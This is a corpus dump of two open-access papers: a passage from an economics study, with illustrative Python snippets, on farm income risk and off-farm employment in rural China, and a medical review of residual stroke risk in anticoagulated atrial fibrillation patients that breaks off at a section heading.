The explanatory variables of key interest in this paper are (1) the variation of farm income, measured as the risk of agricultural production; (2) the expected farm income, which reflects the relative return of agricultural production; and (3) the expected off-farm income, which predicts the return of off-farm activities. Therefore, we adopt three historical income variables which are calculated using income information from the preceding several years: (1) the standard error of per household farm income; (2) the average per household farm income; and (3) the average per household wage income. In order to better investigate the role of perceived agricultural production risks (i.e., how previous years' observed income variability affects farmers' off-farm labor supply), three time periods (three years, five years, and ten years), representing the short, medium and long term, respectively, are included in three alternative specifications. All income variables are at the province level (household/individual level income information for preceding years is not available in our sample; however, province level data should provide a more general historical outlook of local labor market conditions in each province, which farmers, as (potential) labor suppliers, face; as one anonymous referee pointed out, however, such provincial level variables may not fully capture the risks of farming and off-farm income, and may instead be indicators of geographic effects) and are adjusted by provincial CPI to 2010 Yuan. The data source for historical income is the National Bureau of Statistics of China.
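The rolling risk and return regressors can be constructed from a province-year panel along the following lines; again, the file and column names are illustrative assumptions rather than the actual NBSC variable names.

```python
# Sketch of building CPI-deflated rolling risk/return measures by province.
import pandas as pd

panel = pd.read_csv("nbsc_province_income.csv")  # hypothetical panel
panel["real_farm_income"] = panel["farm_income"] / panel["cpi_2010base"]

panel = panel.sort_values(["province", "year"])
grp = panel.groupby("province")["real_farm_income"]
for w in (3, 5, 10):  # short-, medium-, and long-term windows
    panel[f"farm_risk_{w}y"] = grp.transform(lambda s: s.rolling(w).std())
    panel[f"farm_mean_{w}y"] = grp.transform(lambda s: s.rolling(w).mean())
```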
Other explanatory variables represent own characteristics. Household size is the number of family members, which determines the labor supply. The variable 'Male' represents the number of male members in the household and controls for possible productivity differences between males and females. Proximity to the nearest downtown is included to capture the convenience of farmers' access to local markets. Farmland size is assumed to positively affect the relative return of agricultural production. Dependents are defined as individuals under 16 years old; households with dependents need to spend extra time on child care, leading to a decline in total available time (i.e., work and leisure time). The average age of a household controls for possible differences in work time allocation: younger households are often more mobile in searching for an off-farm job and are therefore more likely to work off the farm. Age squared is included to capture the possibility that the depreciation of human capital after a certain age offsets the accumulated experience. Average education per household determines the quality of labor supply, in other words, the capacity to participate in off-farm activities. Similarly, education squared captures the marginal return of formal education on the likelihood of gaining off-farm employment. Average farm experience is hypothesized to positively affect the relative return of agricultural production, as households with more experience tend to be more productive. Dummy variables are assigned to four regions: the Western, Northeastern, Central and Eastern regions. To avoid the dummy-variable trap, the Northeastern region was dropped from the estimation procedure and chosen as the reference category. Table 3 provides summary statistics for all the variables used in the household-level participation equation.
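The reference-category treatment of the regional dummies amounts to the following minimal illustration (labels only; not the authors' code):

```python
# Avoiding the dummy-variable trap: encode the four regions and drop
# the Northeastern region as the reference category.
import pandas as pd

regions = pd.Series(["West", "Northeast", "Central", "East"], name="region")
dummies = pd.get_dummies(regions, prefix="region").drop(columns="region_Northeast")
print(dummies)  # only three dummy columns enter the regression
```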
For the purpose of comparing individual-level and household-level labor supply mechanisms and verifying the robustness of our model, we also assess the off-farm employment decision of individual farm household members. We apply the same econometric model specified above, with similar alternative specifications, to full-time and non-full-time farmers. The dependent variable is defined as whether the individual worker took any off-farm job or remained a pure farmer. (In this study, we focus on whether and why farmers engage in off-farm income-generating activities. However, as one referee pointed out, there are many categories of off-farm activities, which may have varied impacts on farmers. Such a topic is of great importance and is left for future studies.) The structure of this analysis is similar to that of the household-level analysis. Income variables are all in real per capita terms. The Western region was dropped from the estimation procedure and chosen as the reference category. Table 4 provides summary statistics for all the variables used in the individual-level analysis.
Household-Level Results
We run the participation regression using four alternative specifications: (1) without income risk factors; (2) with short-term income risk (three-year); (3) with medium-term income risk (five-year); and (4) with long-term income risk (ten-year). Table 5 provides the Logit regression results at the household level. In almost all respects, the regression models perform well: the estimation of the model as a whole in each specification is highly significant, and the coefficients of all explanatory variables have the expected signs.
For the three scenarios in which previous years' income information, including farm income, off-farm income and farming risk, is taken into account, the results exhibit similar patterns with the expected signs. (We also considered off-farm income risk, measured as the variation of off-farm wages, in our analysis but found its impact insignificant; whether to include it does not change the results. In addition, industrial jobs are more stable and their pay rates are relatively less volatile, especially given the strengthened enforcement of the minimum wage rates that most rural labor suppliers receive. We therefore dropped that variable from our regression model.) In general, there is a significant overall impact of the income factors on the off-farm employment decision, as confirmed by the F tests; in other words, all income variables are relevant and are necessarily retained in the model. In particular, farming risk, as represented by the standard error of historical agricultural income, has a positive and significant effect on the off-farm employment choice. Depending upon the specification, our results reveal that, on average, for an increase of 10,000 Yuan in the standard error of agricultural income, the probability of the household taking off-farm jobs would increase by between 66.6% and 114.1% (Table 6). This pattern reflects the fact that farmers prefer consistent and predictable earnings: rural households are more likely to take off-farm jobs when the risk of farm earnings is high, and taking off-farm jobs is an often-chosen strategy for farmers to hedge against fluctuations in the agricultural sector. Expected incomes based on prior years' earnings have a significant impact, indicating that rural households take their past income into account when making employment decisions. Specifically, households with higher average farm income are more likely to stay on the farm rather than find an off-farm job. In contrast, farmers who previously earned higher off-farm wage income are more likely to take an off-farm job.
It is also found that farmers' off-farm labor supply choices respond to previous income information with fairly different magnitudes across time horizons. First, the impact of farm income variability becomes larger as the time period gets shorter, indicating that people are more sensitive to short-term income oscillations and respond promptly. Second, farmers are more concerned with long-term rather than short-term changes in the income level. For example, the marginal effects of average preceding years' off-farm wage income are 0.13, 0.149 and 0.262 for three, five and ten years, respectively; the long-term effect is almost twice as large as the short-term and medium-term ones. Third, reducing farming risk is far more effective than enhancing farm income in keeping farmers focused on their farmland, especially in the short term. When comparing a reduction in the standard error of farm income with an increase in farm income of the same amount, we find that reducing farming risk is almost 14 times more effective than improving farm income in the short term, six times more in the medium term and three times more in the long term (Table 5). In particular, reducing farming risk (the standard error of prior farm income) by only 100 yuan has the same impact as increasing average agricultural income by 1501 yuan over three years, by 725 yuan over five years and by 427 yuan over ten years. Furthermore, confirming our predictions, the non-income variables all have the expected impacts across the different specifications. The coefficient of household size is positive and statistically significant at the 1% level: households of larger size have more total time to allocate and are thus more likely to send members off the land. The presence of young dependents makes adults more prone to stay on their farm so that they can spend more time on dependents and less time commuting. The relationship between age and the decision to work off-farm is quadratic: there is a threshold age (for example, 61 years old in model 2) below which a farm household has a positive marginal return to seeking an off-farm income source. This is because the present value of future off-farm wages is much smaller for older households, as they have fewer working years left in which to keep their jobs and recoup earnings. This is evident from the coefficient of age squared, which is negative and statistically significant at the 5% level. The result also supports the common impression that the elderly are being left behind in the Chinese countryside. Years of schooling is positively associated with off-farm employment: schooling is generally expected to promote job mobility and migration, and formal education has strong effects in shifting farmers to off-farm work. Average years of farming experience among the labor force is a significant determinant of the off-farm employment decision for rural households; more farming experience corresponds to a lower likelihood of working off the farm. Such experience builds farming-specific human capital and thus increases the return to farming through the higher quality of labor input and better control of production risk.
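The risk-versus-income equivalences quoted above follow directly from the ratio of the two marginal effects. The snippet below reproduces the arithmetic with placeholder marginal-effect values chosen to match the ratios implied in the text, not the actual estimates in Table 6.

```python
# Back-of-envelope check of the trade-off: the income increase with the same
# effect as a 100-yuan risk reduction equals 100 * (me_risk / me_income).
# The marginal-effect values below are placeholders implied by the text.
def equivalent_income_increase(risk_cut_yuan, me_risk, me_income):
    return risk_cut_yuan * (me_risk / me_income)

for horizon, me_risk, me_income in [("3-year", 15.01, 1.0),
                                    ("5-year", 7.25, 1.0),
                                    ("10-year", 4.27, 1.0)]:
    print(horizon, equivalent_income_increase(100, me_risk, me_income))
# -> 1501.0, 725.0 and 427.0 yuan, matching the figures quoted above
```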
Finally, our results reveal that farm households behave significantly differently from one region to another. The tests of the joint significance of the regional dummies (associated p-values of 0.044, 0.073 and 0.023 in models 2, 3 and 4, respectively) allow us to reject the null hypothesis of no regional effect at the 10% significance level. Therefore, we conclude that there is heterogeneity across regions. Specifically, compared with Northeastern China, off-farm employment is more attractive to farm households in the other three regions. Northeastern China is situated on one of the world's most fertile black-soil belts and has the highest endowment of farmland per capita in China. Diversified cultivation as well as the vigorous development of agriculture in recent years make the Northeastern region an attractive and competitive market for farming; therefore, farm households there are more likely to focus on their farmland. It is worth noting that the magnitudes of the coefficients associated with the regional dummies are larger in the short-term specification than in the mid- and long-term specifications. This may indicate an increasing employment access gap between regions over time; that is, the regional disparities in resource allocation might be expanding.
For the purpose of model evaluation, we compared and mapped the actual and estimated off-farm labor decisions. Figure 4a presents the actual percentage of mixed-income households (defined as farm households that had both on- and off-farm income sources) among farm households based on the CHFS survey. Figure 4b shows the expected value of the estimated probability of households working outside their land based on our estimation. Since we present only the provincial average of our estimates, Figure 4 may lose some idiosyncratic information about each household. However, the overall distributions are similar, which suggests a good fit of our model.
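Continuing the earlier estimation sketch, the comparison underlying Figure 4 can be approximated by aggregating actual outcomes and fitted probabilities to the province level (the `province` column is again a hypothetical name):

```python
# Hedged sketch of the Figure 4 model check: actual share of mixed-income
# households vs. provincial averages of the fitted probabilities.
fit_check = (df.assign(p_hat=result.predict())
               .groupby("province")[["offfarm", "p_hat"]]
               .mean())
print(fit_check.corr())  # similar distributions suggest a reasonable fit
```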
Individual-Level Results
Table 7 provides the Logit regression results at the individual level. The results are generally consistent with the household-level analysis. There is a significant overall impact of the income information on the off-farm employment decision among individuals, as confirmed by the F tests. In particular, individual workers who experienced greater farm income variability were significantly more likely to work off-farm in the short term as well as in the medium term. This finding confirms our hypothesis that farm income variation significantly affects the individual employment choice. Expected wage income is found to be a significant determinant of the employment decision among the labor force: higher average wage income in the past results in a higher probability of a family worker seeking an off-farm job in the current year. Similar to the household-level analysis, individual farmers are also more concerned with short-term agricultural risks and long-term income levels, with the former having a much larger impact on off-farm labor supply decisions. Individual characteristics are also found to be statistically significant. The general findings are as follows: (1) males tend to have better access to the off-farm labor market; (2) single workers have more freedom to allocate their labor; (3) young people participate more in the off-farm labor market, whereas older farm operators are more likely to dedicate their time to their own farming activities and less likely to work off-farm due to the higher opportunity costs associated with job searching; (4) rural workers have been increasingly rewarded for their education through better off-farm job access, since farmers with higher education have acquired the skills needed for non-agricultural activities; (5) given the labor constraints faced by farm households, large households are more likely to have one or more members working as part-time farmers or non-farmers; (6) land holdings per capita are negatively associated with the off-farm employment choice, because cultivated land is the major source of agricultural income; this implies that, for farmers with a preference for and expertise in farming, having more arable land can be a more favorable option than seeking off-farm employment; (7) in rural China, the closest county center is the place where non-farm industries and markets are usually located, so proximity to town centers is a crucial determinant of rural household members finding local off-farm jobs; and (8) having more children in a household implies fewer opportunities for the adult labor force to work outside the family farm.
In addition, our results confirm heterogeneity across regions at the individual level. Choosing the Western region as the base category, we find that individual workers in this region are more likely to leave the farm for an off-farm job. The Western region is the least developed and poorest region; this finding is in line with the results of Du et al. [20] that the poor are more likely to migrate. Farming efficiency in this region is quite low due to limited access to inputs, financial services and markets and a heavy reliance on traditional farming techniques. Therefore, working individuals in the rural sector of this region depend heavily on off-farm earnings to improve their living standards.
Comparing household-level and individual-level results, we observe the following differences: (1) expected farm income affects only the household-level employment decision; (2) gender differences are found only at the individual level; (3) farmland size and proximity are negatively associated with labor supply in the off-farm market at the individual level; and (4) age exhibits a quadratic relationship with the off-farm employment choice at the household level, while it shows a negative relationship with individual-level off-farm employment status.
Conclusions
Agriculture remains one of the most important sectors for any nation. It not only provides food and fiber for citizens' necessities but also supports many households and communities in rural areas, especially in a country like China with a dominant share of farm population. The importance of keeping farming communities thriving and self-sustaining in the new era cannot be overstated. However, China's agricultural sector faces some critical challenges. We are concerned with one particular issue: the overall population of professional (pure) farmers has been shrinking over the years. It is well recognized that farmers are moving from the countryside to cities (or towns) for either seasonal or permanent job opportunities due to the growing disparities in wealth and development between rural and urban areas [16,21]. However, the possibility that agricultural production risks may also contribute to China's diminishing population of pure farmers has been largely overlooked; in particular, whether and to what extent such risks affect farm households' off-farm employment in China has not previously been studied. Given the importance of the agricultural sector and the urgency of maintaining stable and sustainable rural communities in China, it is essential to investigate farmers' on- and off-farm labor allocations. Therefore, in this study, we performed an empirical analysis of this topic.
This study contributes to the current literature in two empirical respects. First, to our knowledge, this study is the first attempt to explore the role of agricultural risks in farmers' employment decisions in rural China. By bridging this gap in the literature, our study enables a more comprehensive investigation of the topic and evaluation of policy instruments. Second, we have empirically verified and quantified the effects of the associated explanatory variables. Such empirical evidence provides useful insights for scholars and policy makers.
One major finding is the positive and significant impact of farm income variability on off-farm work participation at both the household and individual levels. This finding implies that off-farm employment is a risk-adaptation behavior among Chinese farmers. If policy makers want to encourage farmers to focus on their land, they should consider policy instruments that reduce the risks to farm income. (We are not trying to advocate policies that restrain labor on the farmland; in fact, the government may also want to encourage farmers to seek off-farm income for various other reasons. Here, we only discuss how to keep farmers focused on their farms if that is the objective of policy makers.) Candidate instruments include, but are not limited to, price support, transfer payments and crop (livestock) insurance programs. All of these policies should encourage pure farming and stabilize the structure of rural society. For instance, to control agricultural production risks, governments could apply subsidized risk management tools against the risks of farm output. In addition, they could provide price support, which generally reduces price variability. These two strategies can be used to dampen income oscillations for farm households. Meanwhile, transfer payments can help low-income families to improve their nutrition and living conditions. While all of these strategies can achieve both income enhancement and risk reduction, policy makers need to decide which objective to focus on, especially if resources are limited. Our results suggest that alleviating farm income risk would generally be much more effective in retaining farmers on their land, especially in the short run. Thus, the government should consider investing more resources in risk mitigation programs (e.g., insurance programs) than in income enhancement programs if an immediate impact is expected.
In addition, our results suggest that if policy makers aim to keep farmers focused on farming, they should consider a combination of policy instruments. First, the level of income is a crucial determinant of off-farm labor decisions, especially in the long run. On the one hand, the government should always exert efforts to support the steady growth of farm income. On the other hand, the government may need to reconsider the regulations on the minimum wages that most migrant workers receive in the non-agricultural sectors: fast-growing minimum wages in the industrial and service sectors not only impose additional costs on producers and consumers in those sectors but may also drain labor supply from the agricultural sector. Second, policy makers should adopt strategies to encourage farmers to expand their scale of operation. The negative effect of farmland holdings on farm workers' likelihood of seeking off-farm employment may imply that, as long as a farmer is able to acquire more land, there is no reason why he must seek an off-farm job or abandon farming entirely. If this reasoning is correct, there are important policy implications for the development of the land market, such as the rental market, which is still in a nascent stage in rural China. In addition, the government may also consider offering monetary incentives for farmers to expand their farms, e.g., by exploiting uncultivated land. Third, the government should employ better strategies to build farming-related human capital. As is evident in our results, although farmers with higher education are more likely to seek off-farm jobs, more farming experience helps to retain farmers. For example, technical and extension education for farmers is expected to enhance their farming knowledge and mitigate production risks. Fourth, it is always important to recognize regional differences when formulating agricultural policies. The government should prioritize the regions that are losing farmers quickly and therefore need support most, e.g., the Western region.
Above all, our main focus has been to develop an empirical approach to evaluate the impact of agricultural production risks on farmers' labor allocation between on- and off-farm income-generating activities. Due to data availability, the empirical analysis is limited to a cross-sectional sample. However, important questions relating to the dynamic behavior of farmers remain of interest. In the future, given access to longitudinal data on rural households' labor supply over multiple years, we hope to extend our model and re-evaluate this topic.
Figure 2. Distribution of farm income per acre and its logarithm in 2010.
Figure 3. Distribution of farm income per acre and its logarithm.
Figure 4. Actual ratio and average estimated probability of taking off-farm jobs. (a) Actual ratio of farm households with off-farm jobs; (b) Average estimated probability of taking off-farm jobs by farm households.
Table 1. Characteristics in two household categories.
Table 2. Characteristics in the rural labor force.
Table 3. Definition and statistics of variables (household-level).
Table 4. Definition and statistics of variables (individual-level).
Table 5. Logit estimates of the household-level participation equation.
Table 6. Marginal effects of the household-level participation equation.
Table 7. Logit estimates of the individual-level participation equation. | 2019-02-06T06:02:54.308Z | 2019-01-29T00:00:00.000 | {
"year": 2019,
"sha1": "a5bc94b59ade6211f9e307375465c06c15500dfb",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2071-1050/11/3/697/pdf?version=1549014717",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "a5bc94b59ade6211f9e307375465c06c15500dfb",
"s2fieldsofstudy": [
"Economics"
],
"extfieldsofstudy": [
"Economics"
]
} |
243822485 | pes2o/s2orc | v3-fos-license | Residual Stroke Risk in Atrial Fibrillation
AF contributes to increased stroke risk via various mechanisms, including deranged blood constituents, vessel wall abnormalities and abnormal blood flow. This excess risk is frequently managed with anticoagulation therapy, aimed at preventing thromboembolic complications. Yet, a significant proportion of patients with AF remain at high residual stroke risk despite receiving appropriate dose-adjusted anticoagulation. This article explores the residual stroke risk in AF and potential therapeutic options for these patients.
Residual Stroke Risk in AF
To begin with, it is important to recognise that anticoagulation therapy reduces, but does not negate, the risk of stroke in AF. Recent estimates among patients with AF found that the annual incidence of stroke or systemic embolism with warfarin was 1.66%, an improvement compared with previous reports of 2.09%, which the authors attributed to better quality of anticoagulation control. 9 There was a significant increase in the annual incidence of stroke or systemic embolism in patients with additional concomitant risk factors (CHADS 2 score ≤1: 0.89% per year; CHADS 2 score 2: 1.43% per year; CHADS 2 score ≥3: 2.50% per year). 9 Notably, the quality of anticoagulation control in that meta-analysis of eight randomised controlled trials, determined using time in therapeutic range (TTR) as between 55% and 68%, remained suboptimal based on the recommendations of >70% according to current international guidelines. [7][8][9] Given the importance of anticoagulation control, efforts were directed at achieving and maintaining a high TTR (>65-70%), especially in high-risk subgroups with AF, in order to improve clinical outcomes. 10 However, the introduction of direct oral anticoagulants (DOACs) has changed the landscape of treatment in patients with AF such that TTR is a distant memory in those treated with these newer agents, although compliance continues to be an issue. 11,12 Overall, DOACs have been shown to be more effective than warfarin for the prevention of stroke or systemic embolism, even in various high-risk AF subgroups, such as patients with concomitant heart failure, valvular heart disease and coronary artery disease. [13][14][15][16] In addition, DOAC therapy may reduce stroke severity compared with warfarin. 17 Nonetheless, in landmark clinical trials evaluating the different DOAC agents against warfarin among patients with AF, the residual risk of stroke or systemic embolism despite anticoagulation treatment was between 1.11% and 2.40% per year ( Table 1). [18][19][20][21] Similar, if not higher, rates of between 1.73% and 2.78% were reported in real-world studies. 22 This residual risk should not be underestimated because the threshold for consideration of oral anticoagulation in AF is approximately 0.9%, corresponding to a CHA 2 DS 2 -VASc score of 1, for the risk of thromboembolism. Therefore, there is a need for greater awareness among clinicians and better risk stratification of residual stroke in patients with AF.
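The quality of warfarin control discussed above is quantified by TTR, conventionally computed with the Rosendaal linear-interpolation method between successive INR measurements. The sketch below is a simplified, day-sampling approximation with toy data, not code from any of the cited studies.

```python
# Approximate Rosendaal TTR: linearly interpolate INR between visits and
# count the fraction of days spent inside the therapeutic range (toy data).
def ttr(days, inrs, low=2.0, high=3.0):
    in_range = total = 0.0
    for (d0, i0), (d1, i1) in zip(zip(days, inrs), zip(days[1:], inrs[1:])):
        span = d1 - d0
        total += span
        for step in range(span):                   # sample each day's midpoint
            inr = i0 + (i1 - i0) * (step + 0.5) / span
            in_range += low <= inr <= high
    return 100.0 * in_range / total

print(ttr([0, 14, 28, 42], [1.8, 2.4, 3.3, 2.6]))  # ~62% time in range 2.0-3.0
```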
There are several potential mechanisms of stroke despite anticoagulation, including small vessel disease, intracranial or extracranial atherosclerotic disease, cryptogenic stroke, arterial dissection and hypercoagulable states (e.g. inherited thrombophilia, antiphospholipid syndrome).
Medication errors have also been previously reported to be common among patients with AF. 23 Furthermore, there are other causes of cardioembolic stroke besides AF, such as mitral stenosis, mechanical heart valves and left ventricular thrombus. An in-depth review of these factors has previously been published. 24 Importantly, anticoagulation therapy has not been proven to be beneficial for stroke prevention in most of these conditions despite an excess risk of bleeding.
Risk Factors for Residual Stroke Risk
AF is a multimorbid condition that is predisposed by the presence of risk factors such as advancing age, hypertension, diabetes, chronic kidney disease, heart failure and coronary artery disease. 25,26 In addition, AF accelerates the progression of disease for many of these risk factors. [26][27][28] Hence, AF rarely occurs in isolation, and concomitant diseases may influence the residual stroke risk either by their individual effects, synergism with AF or by reducing the effectiveness of anticoagulation therapy. Numerous risk factors have been shown to be associated with an increased residual stroke risk in AF. However, there are currently no risk stratification tools that have been validated for the prediction of residual stroke risk in anticoagulated patients with AF. As a result, the identification of high-risk patients can be difficult, especially in the busy clinical environment.
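Although no tool has been validated specifically for residual stroke risk, the baseline CHA2DS2-VASc score referenced throughout this article is computed from simple clinical criteria. The sketch below implements the standard published scoring rules, for illustration only.

```python
# Standard CHA2DS2-VASc scoring: 1 point each for congestive heart failure,
# hypertension, diabetes, vascular disease, age 65-74 and female sex;
# 2 points each for age >= 75 and prior stroke/TIA.
def cha2ds2_vasc(age, female, chf, hypertension, diabetes,
                 stroke_tia, vascular_disease):
    score = (chf + hypertension + diabetes + vascular_disease
             + 2 * stroke_tia + female)
    score += 2 if age >= 75 else (1 if age >= 65 else 0)
    return score

print(cha2ds2_vasc(age=78, female=True, chf=False, hypertension=True,
                   diabetes=True, stroke_tia=False, vascular_disease=False))  # -> 5
```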
Recently, a cohort study of patients who suffered from stroke despite DOAC therapy identified that most of these patients were older, female and hypertensive, with at least Stage 2 chronic kidney disease (estimated glomerular filtration rate <90 ml/min; Table 2). 29 However, that study by Szeto and Hui was limited by its retrospective design and small sample size. 29 A prospective case-control study showed that the use of off-label low-dose DOACs, atrial enlargement, hyperlipidaemia, a high CHA2DS2-VASc score and non-paroxysmal AF were independently associated with an increased risk of stroke events among AF patients. 30 The main contributors from the CHA2DS2-VASc score were increasing age, diabetes, congestive heart failure and prior stroke or transient ischaemic attack (TIA). Unlike in the study of Szeto and Hui, female sex and hypertension were not found to be independent risk factors. 29,30 Interestingly, Paciaroni et al. reported that approximately 30% of patients with cerebrovascular events had stroke due to causes other than cardioembolism; this reinforces the concept that ischaemic stroke in patients with AF is not exclusively cardiogenic in nature. [30][31][32] A post hoc analysis of the SPORTIF trials demonstrated that age ≥75 years, coronary artery disease, smoking and non-use of alcohol were significant predictors of thromboembolism. 33 Using data on anticoagulated patients with AF from the AMADEUS clinical trial, Senoo et al. demonstrated worse outcomes of stroke or systemic embolism, and death, among those with permanent AF, prior cerebrovascular events, coronary artery disease and impaired renal function. 34 However, the results of that post hoc analysis should be interpreted with caution given the historical nature of the trial, even though event outcomes were adjudicated. 33 A meta-analysis of three randomised controlled trials focusing on warfarinised patients with AF found that age ≥75 years, female sex, prior stroke or TIA, vitamin K antagonist-naïve status, moderate or severe renal failure, previous aspirin use, Asian race and a CHADS2 score ≥3 were associated with higher stroke rates. 35 Nonetheless, given the known importance of the quality of anticoagulation control and the fact that it could not be assessed within the different subgroups of that meta-analysis, it is unclear whether the predictors identified were directly related to stroke risk or acted indirectly via their influence on anticoagulation control. 36 In addition, the effects of these risk factors on DOAC therapy remained untested within that study. 35 In contrast, Pancholy et al. performed their meta-analysis using patients from both treatment groups (warfarin and DOAC) and demonstrated that female patients with AF who were treated with warfarin had a greater residual risk of stroke than their male counterparts, but no sex differences were observed with DOACs. 37 Recently, a retrospective cohort study reported that the risk of ischaemic stroke or systemic embolism among patients with AF remained markedly higher than that of the general population even after anticoagulation therapy, as observed previously. 38,39 Furthermore, approximately one-third of the residual risk was secondary to modifiable factors, including hypertension, diabetes and hyperlipidaemia. 38 Overall, there appears to be an overlap between many of the risk factors for residual stroke risk in AF (Figure 1) and those that predispose to stroke events in non-anticoagulated AF patients. 40
Nonetheless, this overlap remains poorly defined, and further studies are needed to determine the extent and mechanisms by which these risk factors affect residual stroke risk in AF.
Potential Treatment Options
Despite some awareness of residual stroke risk in AF, this issue presents a clinical problem to physicians because there is little evidence on effective management strategies for patients recognised to be at high risk. In this regard, several studies have explored the use of antiplatelet agents in addition to anticoagulation to further minimise stroke risk in AF. However, this approach should not be advocated for the management of residual stroke risk among the general AF population, given the increased risk of harm and lack of demonstrable benefit. 41 There is growing evidence to suggest that AF patients who have previously suffered a stroke despite anticoagulation are at increased risk of subsequent strokes compared with anticoagulation-naïve patients, highlighting the importance of managing the residual risk of ischaemic stroke in AF. [43][44][45] Several other strategies have shown positive results for this purpose, including catheter AF ablation, left atrial appendage (LAA) occlusion and adherence to the AF Better Care (ABC) pathway. It is important to highlight that none of these approaches has been specifically proven for the management of residual stroke risk in AF.
Catheter AF Ablation
Contemporary international guidelines recommend rhythm and/or rate control strategies for symptom management in patients with AF. 6,8 This was on the basis of historical studies performed over a decade ago that failed to demonstrate any prognostic advantage of one over the other. [46][47][48] Nonetheless, the results of these studies were confounded by the fact that there were high rates of anticoagulation discontinuation during follow-up among patients who were randomised to receive a rhythm control strategy. A post hoc analysis of the ATHENA trial suggests that a rhythm control approach in addition to usual care may reduce stroke events among patients with AF. 49 Recent evidence demonstrates that early rhythm control, by any means, in AF was beneficial in reducing cardiovascular events (including stroke) compared with rate control. 50 AF ablation is a means of rhythm control and an established treatment for patients with drug-refractory symptomatic AF. Although not used for the sole purpose of risk modification, several observational cohort studies have reported that catheter AF ablation was independently associated with a lower risk of ischaemic stroke, the effects of which were more pronounced among patients with higher CHA 2 DS 2 -VASc score ( Table 3). [51][52][53][54][55] In a study of patients with AF and prior stroke, Bunch et al. found that patients who underwent catheter AF ablation had lower rates of recurrent stroke over a 5-year period compared with those who were not ablated. 56 Notably, the long-term rates of recurrent stroke were comparable between ablated AF patients and non-AF patients. 56 Similar results were obtained in a nationwide study using the Korean National Health Insurance Service (NHIS) database. 57 Recent meta-analyses reinforced that catheter AF ablation significantly reduces the risk of thromboembolism compared with medical therapy alone. 58,59 Importantly, the vast majority of patients in these studies were anticoagulated, suggesting that catheter AF ablation may have a role as adjunctive therapy in the management of residual stroke risk in AF. A further advantage of this strategy is that it may be combined with LAA occlusion (discussed below) in a single procedure. 60 Overall, although catheter AF ablation has shown promise, it is not currently indicated for the reduction of stroke risk in AF because it remains unclear whether this approach may interrupt the natural history of AF and/or cause a significant alteration in the subsequent stroke risk, despite the results from observational studies. This is supported by the lack of a temporal relationship between AF episodes and stroke complications, and an increased risk of thromboembolic events with traditional risk factors, even in the absence of AF. 1,61,62 Moreover, the recent CABANA trial failed to demonstrate a significant benefit of catheter ablation over drug therapy
for the composite endpoint of all-cause death, disabling stroke, serious bleeding or cardiac arrest in the intention-to-treat analysis. 63 For patients who undergo catheter AF ablation, there is some debate as to whether anticoagulation therapy is necessary among those with successful maintenance of sinus rhythm after the initial prothrombotic phase post-ablation. In the landmark AFFIRM trial, patients randomised to the rhythm control arm exhibited a trend towards a greater risk of ischaemic stroke that largely occurred following discontinuation of anticoagulation therapy, indicating that the decision for anticoagulation should be guided by stroke risk factors rather than the perceived success of maintaining sinus rhythm. 47 This observation may be due, in part, to undetected, asymptomatic recurrences that commonly occur in the post-ablation period and are often found only with more aggressive monitoring strategies. 64 Lately, though, there is some evidence to suggest that the stroke risk in AF is significantly lowered by catheter ablation, such that the risk-to-benefit ratio may favour the suspension of oral anticoagulation following a successful procedure. 65 A meta-analysis of seven retrospective cohort studies demonstrated that the withdrawal of anticoagulation 3 months after successful radiofrequency catheter AF ablation was associated with a significant reduction in the risk of haemorrhage and no difference in thromboembolic events at both short- and long-term follow-up. 66 Nonetheless, this is a topic that warrants further investigation. Presently, the decision of whether to anticoagulate patients after successful catheter AF ablation should continue to be guided by individual stroke risk factors, as per contemporary international guidelines. 7,8
Left Atrial Appendage Occlusion
The LAA is an important structure in AF because the majority of cardioembolic strokes originate there. [67][68][69] Therefore, occlusion of this structure acts to isolate it and prevent clot formation and subsequent embolisation. LAA occlusion may be performed using either a surgical or a percutaneous approach. The latter is emerging as a viable treatment alternative to anticoagulation in AF, although more research is required to define its exact role. 70 A meta-analysis of five randomised controlled trials of patients with AF or risk factors for AF comparing LAA occlusion with the standard of care using anticoagulation therapy (in the era of warfarin) found that LAA occlusion was at least non-inferior for stroke prevention, with a potential for reduction in mortality. 71 The PRAGUE-17 randomised controlled trial demonstrated that among AF patients with a high risk of stroke (mean CHA2DS2-VASc score 4.7), LAA occlusion was non-inferior to DOAC therapy in preventing major AF-related cardiovascular, neurological and bleeding events. 72 These results were reaffirmed in a real-world registry of AF patients with a very high stroke risk (CHA2DS2-VASc score ≥5) and 'unacceptable' risk of bleeding, where the residual annual ischaemic stroke risk was 2.8% after LAA occlusion. 73 Furthermore, data from the Amplatzer Cardiac Plug registry suggest that LAA occlusion may be an effective treatment option for secondary stroke prevention in AF patients with anticoagulation-resistant stroke. 74 Nonetheless, the retrospective nature of that small observational study should be acknowledged.
Importantly, none of the aforementioned studies showed that treatment with LAA occlusion was superior to anticoagulation for stroke prevention in AF. Recently, the LAAOS III trial reported that among patients with AF who had undergone cardiac surgery, the risk of ischaemic stroke or systemic embolism over a follow-up period of 3.8 years was lower with concomitant LAA occlusion than without it. 75 The vast majority of patients who received LAA occlusion remained on anticoagulation therapy, supporting the notion that there is a combined effect of LAA occlusion and anticoagulation for stroke prevention in AF. Overall, the use of LAA occlusion as add-on therapy to anticoagulation in AF for patients with high residual stroke risk remains to be proven, although it may offer some hope in desperate situations. 76,77

AF Better Care Pathway

The ABC pathway was introduced as a means to facilitate integrated management of patients with AF in a holistic manner. 78 It was founded on three main principles: 'A', avoid stroke; 'B', better symptom management; and 'C', cardiovascular and comorbidity optimisation. Post hoc analysis of the AFFIRM trial showed that an integrated care approach based on the ABC pathway was associated with a significant decrease in the composite risk of stroke, major bleeding and cardiovascular death compared with non-ABC care. 79 However, this finding was largely driven by a reduction in the risk of major bleeding and cardiovascular death, because stroke risk was not statistically different between the groups. Similarly, the risk of stroke was unchanged in AF patients whose clinical management was adherent to the ABC pathway in the ESC-EORP Atrial Fibrillation General Long-Term Registry. 80 In contrast, nationwide cohort studies of AF patients from the Korean NHIS database demonstrated a significant reduction in the rates of ischaemic stroke with implementation of the ABC pathway. 81,82 In addition, the mAFA-II trial found that patients who were randomised to mobile health management based on the ABC pathway (versus usual care) had lower rates of ischaemic stroke. 83 Overall, the differences in the results of these studies may relate to the methods by which the ABC pathway was evaluated and patients were deemed ABC adherent.
A recent meta-analysis of the ABC pathway in AF showed that this strategy was associated with a 45% reduction in the risk of ischaemic stroke, indicating the benefit of this approach in the management of residual stroke risk in AF. 84
Management of Residual Stroke Risk
